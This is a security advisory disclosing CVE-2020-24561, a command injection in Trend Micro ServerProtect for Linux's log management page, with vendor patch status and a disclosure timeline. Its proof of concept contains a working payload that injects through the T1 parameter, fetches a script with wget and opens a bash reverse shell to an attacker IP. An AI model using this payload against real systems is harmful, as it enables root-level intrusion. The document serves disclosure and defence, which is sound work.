DESCRIPTION
Trend Micro ServerProtect for Linux (ServerProtect) provides comprehensive protection against viruses, worms, Trojans, and spyware/grayware targeted at file servers based on the Linux operating system. Managed through an intuitive portable Web-based console, ServerProtect provides centralized virus/malware scanning, pattern updates, event reporting, and antivirus configuration.
More information at https://success.trendmicro.com/product-support/serverprotect-for-linux.
SUMMARY
| PRODUCT | ServerProtect for Linux |
|---|---|
| VENDOR | Trend Micro |
| AFFECTED VERSIONS | All version prior version 3.0 repack 2 |
| SEVERITY | CRITICAL |
| IDENTIFIER | CVE-2020-24561 |
| TESTED PLATFORM | SPLX30-64 for CentOS 8.0 / Redhat8 |
Command injection vulnerability found in Server Protect Linux. The`log_management.cgi`did not sanitize input parameter before execute system command. This issue can be exploit after login as administrator. Attacker can perform remote code execution with this issue.
IMPACT
Post-Auth Remote Code Execution.
DETAILS
When ServerProtect is installed, it will be run as root privileged.
ServerProtect has web interface and can be login as administrator with null password (fresh install)
**Log Directory** is a page that help user specify the location where they want to store all the log files. If that directory is new, it will pop-up a form to ask user want to create it or not
After submitted the save log directory request, it will be saved in `/opt/TrendMicro/SProtectLinux/tmsplx.xml`. Then, application will use **xmlvalidator** binary in folder `/opt/TrendMicro/SProtectLinux/SPLX.util/` to parse this *xml* file.
We did reverse engineering **xmlvalidator** binary and found that it run function `system(command)` to create folder if it has not created yet. `command` parameter at first is
`command = "/bin/mkdir -p -m 0700" `,
Then it will add the new directory *NEW_PATH* that we input in web interface.
`command += NEW_PATH + ">/dev/null 2>&1"`
So we can inject command through this *NEW_PATH* to exploit
When we tried to attempt command injection here with command `touch ECQPoC` but it didn't work. It added splashes before `[space]`. We attempted to bypass it with `${IFS}`.
So the command we injected become `touch${IFS}ECQPoc` and the full data parse to `T1` parameter is `/a;touch${IFS}ECQPoC`. But javascript in web client check special characters so we need to intercept and send the request through **BurpSuite**.
Then, We found that file `ECQPoC` created in folder `/opt/TrendMicro/SProtectLinux/ECQPoC`
PROOF OF CONCEPT
We attempt to perform a proof-of-concept : Create a reverse shell connect back to our server.
Firstly, We created a simple reverse shell `index.html` file in our server. `192.168.1.109` is our attacker server and `31337` is listening port on our server:
```
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.109/31337 0>&1
```
Then we served a HTTP server on port `5555` with simpe HTTPServer python :
`$ python2 -m SimpleHTTPServer 5555`
In other terminal, We listened on port `31337` to wait for reverse shell.
`$ nc -lvp 31337`Then we POST request to URL : https://HOST:14943/SProtectLinux/log_management.cgi? with payload in `T1` parameter:
`/b;wget${IFS}192.168.1.109:5555;bash${IFS}index.html`
VENDOR STATUS
Trend Micro has released a new Critical Patch (CP) for Trend Micro ServerProtect for Linux 3.0, which resolves a command injection vulnerability in the product. https://success.trendmicro.com/solution/000268419
CREDIT
Thai Nguyen
DISCLOSURE TIMELINE
| Date | Sumary |
|---|---|
| 26/10/2018 | Vulnerability discovered |
| 23/07/2020 | ECQ sent the advisory to Trend Micro Vulnerability Response Team (TMVR) |
| 23/07/2020 | TMVR Team received report and submitted to the relevant technical team |
| 13/08/2020 | TMVR Team validated issue and planning to release a Critical Patch |
| 16/09/2020 | TMVR Team released the solution and security bulletin for the vulnerability report |
| 17/05/2021 | Advisory Published |
APPENDIX
N/A